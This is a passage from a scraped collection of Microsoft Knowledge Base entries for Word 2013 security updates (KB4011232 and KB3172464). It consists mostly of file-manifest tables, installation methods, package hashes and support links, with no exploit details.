st.idx_dll_1029</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>630976</td><td>4-Oct-17</td><td>10:54</td></tr><tr><td>wwintl.dll.idx_dll_1030</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>114368</td><td>4-Oct-17</td><td>10:54</td></tr><tr><td>wwintl.rest.idx_dll_1030</td><td>wwintl.rest.idx_dll</td><td>15.0.4937.1000</td><td>620736</td><td>4-Oct-17</td><td>10:54</td></tr><tr><td>wwintl.dll.idx_dll_1031</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>115904</td><td>4-Oct-17</td><td>10:54</td></tr><tr><td>wwintl.rest.idx_dll_1031</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>624832</td><td>4-Oct-17</td><td>10:54</td></tr><tr><td>wwintl.dll.idx_dll_1032</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>115912</td><td>4-Oct-17</td><td>10:54</td></tr><tr><td>wwintl.rest.idx_dll_1032</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>528064</td><td>4-Oct-17</td><td>10:54</td></tr><tr><td>wwintl.dll.idx_dll_1033</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>117504</td><td>4-Oct-17</td><td>03:04</td></tr><tr><td>wwintl.rest.idx_dll_1033</td><td>wwintl.rest.idx_dll</td><td>15.0.4569.1501</td><td>628424</td><td>4-Oct-17</td><td>03:04</td></tr><tr><td>wwintl.dll.idx_dll_3082</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>115392</td><td>4-Oct-17</td><td>10:54</td></tr><tr><td>wwintl.rest.idx_dll_3082</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>630464</td><td>4-Oct-17</td><td>10:54</td></tr><tr><td>wwintl.dll.idx_dll_1061</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>116928</td><td>4-Oct-17</td><td>10:54</td></tr><tr><td>wwintl.rest.idx_dll_1061</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>528064</td><td>4-Oct-17</td><td>10:54</td></tr><tr><td>wwintl.dll.idx_dll_1035</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>117440</td><td>4-Oct-17</td><td>10:54</td></tr><tr><td>wwintl.rest.idx_dll_1035</td><td>wwintl.rest.idx_dll</td><td>15.0.4569.1504</td><td>621224</td><td>4-Oct-17</td><td>10:54</td></tr><tr><td>wwintl.dll.idx_dll_1036</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>115392</td><td>4-Oct-17</td><td>10:54</td></tr><tr><td>wwintl.rest.idx_dll_1036</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>628416</td><td>4-Oct-17</td><td>10:54</td></tr><tr><td>wwintl.dll.idx_dll_1037</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>116928</td><td>4-Oct-17</td><td>10:54</td></tr><tr><td>wwintl.rest.idx_dll_1037</td><td>wwintl.rest.idx_dll</td><td>15.0.4569.1504</td><td>520360</td><td>4-Oct-17</td><td>10:54</td></tr><tr><td>wwintl.dll.idx_dll_1081</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>115904</td><td>4-Oct-17</td><td>10:54</td></tr><tr><td>wwintl.rest.idx_dll_1081</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>524480</td><td>4-Oct-17</td><td>10:54</td></tr><tr><td>wwintl.dll.idx_dll_1050</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>118984</td><td>4-Oct-17</td><td>10:54</td></tr><tr><td>wwintl.rest.idx_dll_1050</td><td>wwintl.rest.idx_dll</td><td>15.0.4569.1504</td><td>625832</td><td>4-Oct-17</td><td>10:54</td></tr><tr><td>wwintl.dll.idx_dll_1038</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>116416</td><td>4-Oct-17</td><td>10:54</td></tr><tr><td>wwintl.rest.idx_dll_1038</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>623808</td><td>4-Oct-17</td><td>10:54</td></tr><tr><td>wwintl.dll.idx_dll_1057</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>116928</td><td>4-Oct-17</td><td>10:54</td></tr><tr><td>wwintl.rest.idx_dll_1057</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>531136</td><td>4-Oct-17</td><td>10:54</td></tr><tr><td>wwintl.dll.idx_dll_1040</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>114880</td><td>4-Oct-17</td><td>10:54</td></tr><tr><td>wwintl.rest.idx_dll_1040</td><td>wwintl.rest.idx_dll</td><td>15.0.4569.1504</td><td>620712</td><td>4-Oct-17</td><td>10:54</td></tr><tr><td>wwintl.dll.idx_dll_1041</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>115392</td><td>4-Oct-17</td><td>10:54</td></tr><tr><td>wwintl.rest.idx_dll_1041</td><td>wwintl.rest.idx_dll</td><td>15.0.4569.1504</td><td>496296</td><td>4-Oct-17</td><td>10:54</td></tr><tr><td>wwintl.dll.idx_dll_1087</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>113352</td><td>4-Oct-17</td><td>10:54</td></tr><tr><td>wwintl.rest.idx_dll_1087</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>525504</td><td>4-Oct-17</td><td>10:54</td></tr><tr><td>wwintl.dll.idx_dll_1042</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>113344</td><td>4-Oct-17</td><td>10:54</td></tr><tr><td>wwintl.rest.idx_dll_1042</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>511680</td><td>4-Oct-17</td><td>10:54</td></tr><tr><td>wwintl.dll.idx_dll_1063</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>117440</td><td>4-Oct-17</td><td>10:54</td></tr><tr><td>wwintl.rest.idx_dll_1063</td><td>wwintl.rest.idx_dll</td><td>15.0.4569.1504</td><td>522408</td><td>4-Oct-17</td><td>10:54</td></tr><tr><td>wwintl.dll.idx_dll_1062</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>118976</td><td>4-Oct-17</td><td>10:54</td></tr><tr><td>wwintl.rest.idx_dll_1062</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>532672</td><td>4-Oct-17</td><td>10:54</td></tr><tr><td>wwintl.dll.idx_dll_1086</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>116928</td><td>4-Oct-17</td><td>10:54</td></tr><tr><td>wwintl.rest.idx_dll_1086</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>530112</td><td>4-Oct-17</td><td>10:54</td></tr><tr><td>wwintl.dll.idx_dll_1044</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>114880</td><td>4-Oct-17</td><td>10:55</td></tr><tr><td>wwintl.rest.idx_dll_1044</td><td>wwintl.rest.idx_dll</td><td>15.0.4569.1504</td><td>614056</td><td>4-Oct-17</td><td>10:55</td></tr><tr><td>wwintl.dll.idx_dll_1043</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>114888</td><td>4-Oct-17</td><td>10:55</td></tr><tr><td>wwintl.rest.idx_dll_1043</td><td>wwintl.rest.idx_dll</td><td>15.0.4945.1000</td><td>625864</td><td>4-Oct-17</td><td>10:55</td></tr><tr><td>wwintl.dll.idx_dll_1045</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>117952</td><td>4-Oct-17</td><td>10:55</td></tr><tr><td>wwintl.rest.idx_dll_1045</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>528064</td><td>4-Oct-17</td><td>10:55</td></tr><tr><td>wwintl.dll.idx_dll_1046</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>118464</td><td>4-Oct-17</td><td>10:55</td></tr><tr><td>wwintl.rest.idx_dll_1046</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>637120</td><td>4-Oct-17</td><td>10:55</td></tr><tr><td>wwintl.dll.idx_dll_2070</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>118464</td><td>4-Oct-17</td><td>10:55</td></tr><tr><td>wwintl.rest.idx_dll_2070</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>637632</td><td>4-Oct-17</td><td>10:55</td></tr><tr><td>wwintl.dll.idx_dll_1048</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>117440</td><td>4-Oct-17</td><td>10:55</td></tr><tr><td>wwintl.rest.idx_dll_1048</td><td>wwintl.rest.idx_dll</td><td>15.0.4569.1504</td><td>618664</td><td>4-Oct-17</td><td>10:55</td></tr><tr><td>wwintl.dll.idx_dll_1049</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>115904</td><td>4-Oct-17</td><td>10:55</td></tr><tr><td>wwintl.rest.idx_dll_1049</td><td>wwintl.rest.idx_dll</td><td>15.0.4569.1504</td><td>514728</td><td>4-Oct-17</td><td>10:55</td></tr><tr><td>wwintl.dll.idx_dll_1051</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>117448</td><td>4-Oct-17</td><td>10:55</td></tr><tr><td>wwintl.rest.idx_dll_1051</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>631488</td><td>4-Oct-17</td><td>10:55</td></tr><tr><td>wwintl.dll.idx_dll_1060</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>116928</td><td>4-Oct-17</td><td>10:55</td></tr><tr><td>wwintl.rest.idx_dll_1060</td><td>wwintl.rest.idx_dll</td><td>15.0.4569.1504</td><td>612520</td><td>4-Oct-17</td><td>10:55</td></tr><tr><td>wwintl.dll.idx_dll_2074</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>117952</td><td>4-Oct-17</td><td>10:55</td></tr><tr><td>wwintl.rest.idx_dll_2074</td><td>wwintl.rest.idx_dll</td><td>15.0.4569.1504</td><td>522408</td><td>4-Oct-17</td><td>10:55</td></tr><tr><td>wwintl.dll.idx_dll_1053</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>114368</td><td>4-Oct-17</td><td>10:55</td></tr><tr><td>wwintl.rest.idx_dll_1053</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>621760</td><td>4-Oct-17</td><td>10:55</td></tr><tr><td>wwintl.dll.idx_dll_1054</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>114880</td><td>4-Oct-17</td><td>10:55</td></tr><tr><td>wwintl.rest.idx_dll_1054</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>519872</td><td>4-Oct-17</td><td>10:55</td></tr><tr><td>wwintl.dll.idx_dll_1055</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>117952</td><td>4-Oct-17</td><td>10:55</td></tr><tr><td>wwintl.rest.idx_dll_1055</td><td>wwintl.rest.idx_dll</td><td>15.0.4569.1504</td><td>625320</td><td>4-Oct-17</td><td>10:55</td></tr><tr><td>wwintl.dll.idx_dll_1058</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>116928</td><td>4-Oct-17</td><td>10:55</td></tr><tr><td>wwintl.rest.idx_dll_1058</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>533184</td><td>4-Oct-17</td><td>10:55</td></tr><tr><td>wwintl.dll.idx_dll_1066</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>117952</td><td>4-Oct-17</td><td>10:55</td></tr><tr><td>wwintl.rest.idx_dll_1066</td><td>wwintl.rest.idx_dll</td><td>15.0.4569.1504</td><td>527528</td><td>4-Oct-17</td><td>10:55</td></tr><tr><td>wwintl.dll.idx_dll_2052</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>116416</td><td>4-Oct-17</td><td>10:55</td></tr><tr><td>wwintl.rest.idx_dll_2052</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>517312</td><td>4-Oct-17</td><td>10:55</td></tr><tr><td>wwintl.dll.idx_dll_1028</td><td>wwintl.dll.idx_dll</td><td>15.0.4875.1000</td><td>114368</td><td>4-Oct-17</td><td>10:55</td></tr><tr><td>wwintl.rest.idx_dll_1028</td><td>wwintl.rest.idx_dll</td><td>15.0.4885.1000</td><td>516800</td><td>4-Oct-17</td><td>10:55</td></tr><tr><td>winword.veman.xml</td><td>winword.visualelementsmanifest.xml</td><td>\u00a0</td><td>342</td><td>4-Oct-17</td><td>03:04</td></tr><tr><td>winword.veman.xml</td><td>winwordd.visualelementsmanifest.xml</td><td>\u00a0</td><td>342</td><td>4-Oct-17</td><td>03:04</td></tr><tr><td>bibform.xml_1033</td><td>bibform.xml</td><td>\u00a0</td><td>111310</td><td>4-Oct-17</td><td>03:05</td></tr><tr><td>wac.word.wwintl.dll_1033</td><td>wwintl.dll</td><td>15.0.4875.1000</td><td>874688</td><td>4-Oct-17</td><td>03:04</td></tr><tr><td>wdsrv.conversion.word.wwintl.dll_1033</td><td>wwintl.dll</td><td>15.0.4875.1000</td><td>874688</td><td>4-Oct-17</td><td>03:04</td></tr><tr><td>wwintl.dll_1033</td><td>wwintl.dll</td><td>15.0.4875.1000</td><td>874688</td><td>4-Oct-17</td><td>03:04</td></tr><tr><td>msword.olb</td><td>msword.olb</td><td>\u00a0</td><td>925344</td><td>4-Oct-17</td><td>03:04</td></tr><tr><td>winword.exe</td><td>winword.exe</td><td>15.0.4971.1002</td><td>1933992</td><td>4-Oct-17</td><td>03:04</td></tr><tr><td>wrd12cnv.dll</td><td>wordcnv.dll</td><td>15.0.4971.1002</td><td>8318632</td><td>4-Oct-17</td><td>03:04</td></tr><tr><td>wrd12pxy.cnv</td><td>wordcnvpxy.cnv</td><td>\u00a0</td><td>30784</td><td>4-Oct-17</td><td>03:04</td></tr><tr><td>wrd12exe.exe</td><td>wordconv.exe</td><td>15.0.4454.1000</td><td>26192</td><td>4-Oct-17</td><td>03:04</td></tr><tr><td>wwlib.dll</td><td>wwlib.dll</td><td>15.0.4971.1002</td><td>27840680</td><td>4-Oct-17</td><td>03:04</td></tr></tbody></table></div></div></div><h2>How to get help and support for this security update</h2><p>Help for installing updates:\u00a0<a aria-live=\"rude\" href=\"https://support.microsoft.com/help/12373/windows-update-faq\" managed-link=\"\" tabindex=\"0\" target=\"_self\">Windows Update FAQ</a></p><p>Security solutions for IT professionals:\u00a0<a aria-live=\"rude\" bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/security/bb980617.aspx\" managed-link=\"\" tabindex=\"0\" target=\"_self\">Security Support and Troubleshooting</a></p><p>Help for protecting your Windows-based computer from viruses and malware:\u00a0<a aria-live=\"rude\" bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" managed-link=\"\" tabindex=\"0\" target=\"_self\">Microsoft Secure</a></p><p>Local support according to your country: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com\" managed-link=\"\" target=\"\">International Support</a><br/><br/>Propose a feature or provide feedback on Office Core: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://office.uservoice.com/\" managed-link=\"\" target=\"\">Office User Voice portal</a></p></body></html>", "edition": 12, "modified": "2020-04-16T09:09:00", "id": "KB4011232", "href": "https://support.microsoft.com/en-us/help/4011232/", "published": "2017-10-10T00:00:00", "title": "Description of the security update for Word 2013: October 10, 2017", "type": "mskb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:46:04", "bulletinFamily": "microsoft", "cvelist": [], "description": "<html><body><p>Describes a security update that fixes vulnerabilities in Microsoft Office. The most severe of these vulnerabilities could allow remote code execution if a user opens a specially crafted Microsoft Office file.</p><h2>Summary</h2><div><p>This security update resolves vulnerabilities in Microsoft Office that could allow remote code execution if a user opens a specially crafted Office file. To learn more about these vulnerabilities, see <a href=\"https://technet.microsoft.com/library/security/MS17-014\">Microsoft Security Bulletin MS17-014</a>.<br/><br/><strong>Note</strong> To apply this security update, you must have the release version of <a href=\"http://support.microsoft.com/kb/2817430\">Service Pack 1 for Microsoft Office 2013</a> installed on the computer.<br/><br/>For a complete list of affected versions of Microsoft Office software, see Microsoft Knowledge Base article <a href=\"https://support.microsoft.com/kb/4013241\">4013241</a>.</p></div><h2>Improvements and fixes</h2><div>This security update contains improvements and fixes for the following nonsecurity issues:<ul linespacing=\"1\" style=\"list-style-type:UnorderedBullets\" type=\"UnorderedBullets\"><li>Improve the memory consumption for Microsoft Word 2013.</li><li>Assume that you paste Microsoft Excel cells as an OLE object in an email draft in Microsoft Outlook 2013. When you open the draft, the OLE object is no longer linked, and the link is broken.</li><li>When you reply or forward an email message in Outlook 2013, the spell checker checks the previous message even if the <strong>Ignore original message text </strong>option is enabled.</li><li>When you print a document that is set as final in Word 2013, the date and time value disappears.</li></ul></div><h2>How to get and install the update</h2><h3>Method 1: Microsoft Update</h3><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr><td faq-panel-body=\"\">This update is available from Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to get security updates automatically, see <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/en-us/help/12373/windows-update-faq\" managed-link=\"\" target=\"\">Windows Update: FAQ</a>.</td></tr></tbody></table><h3>Method 2: Microsoft Update Catalog</h3><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr><td faq-panel-body=\"\">To get the stand-alone package for this update, go to the <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://www.catalog.update.microsoft.com/Search.aspx?q=KB3172464\" managed-link=\"\" target=\"\">Microsoft Update Catalog</a> website.</td></tr></tbody></table><h3>Method 3: Microsoft Download Center</h3><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr><td faq-panel-body=\"\">You can get the stand-alone update package through the Microsoft Download Center. Follow the installation instructions on the download page to install the update.<ul linespacing=\"1\" style=\"list-style-type:UnorderedBullets\" type=\"UnorderedBullets\"><li><span asset=\"4009805\" contenteditable=\"false\" props='{\"size\":\"full\"}' unselectable=\"on\">4009805</span><a bookmark-id=\"\" data-content-id=\"\" href=\"http://www.microsoft.com/download/details.aspx?familyid=f1cf3298-745e-440e-a4d3-168f0c42cdb4\" managed-link=\"\">Download the security update KB3172464 for the 32-bit version of Word 2013</a></li><li><span asset=\"4009805\" contenteditable=\"false\" props='{\"size\":\"full\"}' unselectable=\"on\">4009805</span><a bookmark-id=\"\" data-content-id=\"\" href=\"http://www.microsoft.com/download/details.aspx?familyid=19d33053-5b7c-46c0-8fa2-1d31edd09943\" managed-link=\"\">Download the security update KB3172464 for the 64-bit version of Word 2013</a></li></ul></td></tr></tbody></table><h2>More Information</h2><h3>Security update deployment information</h3><p>For deployment information about this update, see Microsoft Knowledge Base article <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4013241\" managed-link=\"\" target=\"\">4013241</a>.</p><h3>Security update replacement information</h3><p>This security update replaces previously released security update <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/3127932\" managed-link=\"\" target=\"\">KB3127932</a>.</p><h3>File hash information</h3><table class=\"table\"><tbody><tr><th>Package Name</th><th>Package Hash SHA 1</th><th>Package Hash SHA 2</th></tr><tr><td>word2013-kb3172464-fullfile-x64-glb.exe</td><td>2FC0725BA22970E0379B14274276DA5ABB60C452</td><td>C020D521A2C34BB43251244BF0F326CD7D65759E39991B2ACC270337CE8A1234</td></tr><tr><td>word2013-kb3172464-fullfile-x86-glb.exe\u00a0</td><td>AE4F122AF96F5C8FD9364DB8527E5A7F5C7278A1\u00a0</td><td>C42C9F562C172538D449E86BD647375531D260DC77D36411F7296F900F5DB44A\u00a0</td></tr></tbody></table><h3>File information</h3><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr><td faq-panel-body=\"\">The English version of this security update has the file attributes (or later file attributes) that are listed in the following table.<h4><br/>For all supported x86-based versions of Word 2013</h4><table class=\"table\"><tbody><tr><th>File identifier</th><th>File name</th><th>File version</th><th>File size</th><th>Date</th><th>Time</th></tr><tr><td>calligra.dll</td><td>calligra.dll</td><td>15.0.4545.1000</td><td>279752</td><td>26-Feb-17</td><td>02:04</td></tr><tr><td>bibform.xml_1025</td><td>bibform.xml</td><td>\u00a0</td><td>106100</td><td>26-Feb-17</td><td>02:01</td></tr><tr><td>wwintl.dll_1025</td><td>wwintl.dll</td><td>15.0.4885.1000</td><td>947384</td><td>26-Feb-17</td><td>01:33</td></tr><tr><td>wwintl.dll_1026</td><td>wwintl.dll</td><td>15.0.4885.1000</td><td>997560</td><td>26-Feb-17</td><td>01:33</td></tr><tr><td>bibform.xml_1029</td><td>bibform.xml</td><td>\u00a0</td><td>112512</td><td>26-Feb-17</td><td>02:02</td></tr><tr><td>wwintl.dll_1029</td><td>wwintl.dll</td><td>15.0.4885.1000</td><td>1065656</td><td>26-Feb-17</td><td>01:33</td></tr><tr><td>wwintl.dll_1030</td><td>wwintl.dll</td><td>15.0.4875.1000</td><td>905920</td><td>26-Feb-17</td><td>01:33</td></tr><tr><td>bibform.xml_1031</td><td>bibform.xml</td><td>\u00a0</td><td>114240</td><td>26-Feb-17</td><td>02:01</td></tr><tr><td>wwintl.dll_1031</td><td>wwintl.dll</td><td>15.0.4885.1000</td><td>993976</td><td>26-Feb-17</td><td>01:33</td></tr><tr><td>bibform.xml_1032</td><td>bibform.xml</td><td>\u00a0</td><td>114340</td><td>26-Feb-17</td><td>02:02</td></tr><tr><td>wwintl.dll_1032</td><td>wwintl.dll</td><td>15.0.4885.1000</td><td>1132216</td><td>26-Feb-17</td><td>01:33</td></tr><tr><td>bibform.xml_3082</td><td>bibform.xml</td><td>\u00a0</td><td>114930</td><td>26-Feb-17</td><td>02:02</td></tr><tr><td>wwintl.dll_3082</td><td>wwintl.dll</td><td>15.0.4885.1000</td><td>941240</td><td>26-Feb-17</td><td>01:33</td></tr><tr><td>wwintl.dll_1061</td><td>wwintl.dll</td><td>15.0.4885.1000</td><td>922296</td><td>26-Feb-17</td><td>01:33</td></tr><tr><td>wwintl.dll_1035</td><td>wwintl.dll</td><td>15.0.4875.1000</td><td>925368</td><td>26-Feb-17</td><td>01:33</td></tr><tr><td>bibform.xml_1036</td><td>bibform.xml</td><td>\u00a0</td><td>114844</td><td>26-Feb-17</td><td>02:02</td></tr><tr><td>wwintl.dll_1036</td><td>wwintl.dll</td><td>15.0.4885.1000</td><td>1049784</td><td>26-Feb-17</td><td>01:33</td></tr><tr><td>bibform.xml_1037</td><td>bibform.xml</td><td>\u00a0</td><td>106424</td><td>26-Feb-17</td><td>02:02</td></tr><tr><td>wwintl.dll_1037</td><td>wwintl.dll</td><td>15.0.4875.1000</td><td>937656</td><td>26-Feb-17</td><td>01:33</td></tr><tr><td>wwintl.dll_1081</td><td>wwintl.dll</td><td>15.0.4885.1000</td><td>966840</td><td>26-Feb-17</td><td>01:33</td></tr><tr><td>wwintl.dll_1050</td><td>wwintl.dll</td><td>15.0.4875.1000</td><td>947384</td><td>26-Feb-17</td><td>01:33</td></tr><tr><td>bibform.xml_1038</td><td>bibform.xml</td><td>\u00a0</td><td>112560</td><td>26-Feb-17</td><td>02:02</td></tr><tr><td>wwintl.dll_1038</td><td>wwintl.dll</td><td>15.0.4885.1000</td><td>1086136</td><td>26-Feb-17</td><td>01:33</td></tr><tr><td>wwintl.dll_1057</td><td>wwintl.dll</td><td>15.0.4885.1000</td><td>867000</td><td>26-Feb-17</td><td>01:33</td></tr><tr><td>bibform.xml_1040</td><td>bibform.xml</td><td>\u00a0</td><td>112426</td><td>26-Feb-17</td><td>02:02</td></tr><tr><td>wwintl.dll_1040</td><td>wwintl.dll</td><td>15.0.4875.1000</td><td>947896</td><td>26-Feb-17</td><td>01:33</td></tr><tr><td>bibform.xml_1041</td><td>bibform.xml</td><td>\u00a0</td><td>97202</td><td>26-Feb-17</td><td>02:01</td></tr><tr><td>wwintl.dll_1041</td><td>wwintl.dll</td><td>15.0.4875.1000</td><td>1004728</td><td>26-Feb-17</td><td>01:33</td></tr><tr><td>wwintl.dll_1087</td><td>wwintl.dll</td><td>15.0.4885.1000</td><td>1025208</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>bibform.xml_1042</td><td>bibform.xml</td><td>\u00a0</td><td>97630</td><td>26-Feb-17</td><td>02:02</td></tr><tr><td>wwintl.dll_1042</td><td>wwintl.dll</td><td>15.0.4885.1000</td><td>1004216</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>wwintl.dll_1063</td><td>wwintl.dll</td><td>15.0.4875.1000</td><td>1006264</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>bibform.xml_1062</td><td>bibform.xml</td><td>\u00a0</td><td>114514</td><td>26-Feb-17</td><td>02:02</td></tr><tr><td>wwintl.dll_1062</td><td>wwintl.dll</td><td>15.0.4885.1000</td><td>982200</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>wwintl.dll_1086</td><td>wwintl.dll</td><td>15.0.4885.1000</td><td>870584</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>wwintl.dll_1044</td><td>wwintl.dll</td><td>15.0.4875.1000</td><td>914616</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>bibform.xml_1043</td><td>bibform.xml</td><td>\u00a0</td><td>113208</td><td>26-Feb-17</td><td>02:02</td></tr><tr><td>wwintl.dll_1043</td><td>wwintl.dll</td><td>15.0.4885.1000</td><td>932536</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>wwintl.dll_1045</td><td>wwintl.dll</td><td>15.0.4885.1000</td><td>1044152</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>bibform.xml_1046</td><td>bibform.xml</td><td>\u00a0</td><td>111828</td><td>26-Feb-17</td><td>02:03</td></tr><tr><td>wwintl.dll_1046</td><td>wwintl.dll</td><td>15.0.4885.1000</td><td>949944</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>wwintl.dll_2070</td><td>wwintl.dll</td><td>15.0.4885.1000</td><td>963256</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>wwintl.dll_1048</td><td>wwintl.dll</td><td>15.0.4875.1000</td><td>1085112</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>bibform.xml_1049</td><td>bibform.xml</td><td>\u00a0</td><td>112712</td><td>26-Feb-17</td><td>02:03</td></tr><tr><td>wwintl.dll_1049</td><td>wwintl.dll</td><td>15.0.4875.1000</td><td>970424</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>bibform.xml_1051</td><td>bibform.xml</td><td>\u00a0</td><td>111034</td><td>26-Feb-17</td><td>02:03</td></tr><tr><td>wwintl.dll_1051</td><td>wwintl.dll</td><td>15.0.4885.1000</td><td>1083576</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>wwintl.dll_1060</td><td>wwintl.dll</td><td>15.0.4875.1000</td><td>970936</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>wwintl.dll_2074</td><td>wwintl.dll</td><td>15.0.4875.1000</td><td>1003192</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>wwintl.dll_1053</td><td>wwintl.dll</td><td>15.0.4885.1000</td><td>913080</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>wwintl.dll_1054</td><td>wwintl.dll</td><td>15.0.4885.1000</td><td>933048</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>wwintl.dll_1055</td><td>wwintl.dll</td><td>15.0.4875.1000</td><td>1041080</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>wwintl.dll_1058</td><td>wwintl.dll</td><td>15.0.4885.1000</td><td>977080</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>bibform.xml_1066</td><td>bibform.xml</td><td>\u00a0</td><td>113620</td><td>26-Feb-17</td><td>02:04</td></tr><tr><td>wwintl.dll_1066</td><td>wwintl.dll</td><td>15.0.4875.1000</td><td>1072824</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>bibform.xml_2052</td><td>bibform.xml</td><td>\u00a0</td><td>96830</td><td>26-Feb-17</td><td>02:04</td></tr><tr><td>wwintl.dll_2052</td><td>wwintl.dll</td><td>15.0.4885.1000</td><td>823480</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>bibform.xml_1028</td><td>bibform.xml</td><td>\u00a0</td><td>96804</td><td>26-Feb-17</td><td>02:04</td></tr><tr><td>wwintl.dll_1028</td><td>wwintl.dll</td><td>15.0.4885.1000</td><td>837304</td><td>26-Feb-17</td><td>01:34</td></tr><tr><td>document_parts.dot_1025</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3633666</td><td>26-Feb-17</td><td>02:01</td></tr><tr><td>document_parts.dot_1026</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3637449</td><td>26-Feb-17</td><td>02:02</td></tr><tr><td>document_parts.dot_1029</td><td>built-in building blocks.dotx</td><td>\u00a0</td><td>3618985</td><td>26-Feb-17</td><td>02:02</td></tr><tr><td>document_parts.dot_1030</td><td>built-in building 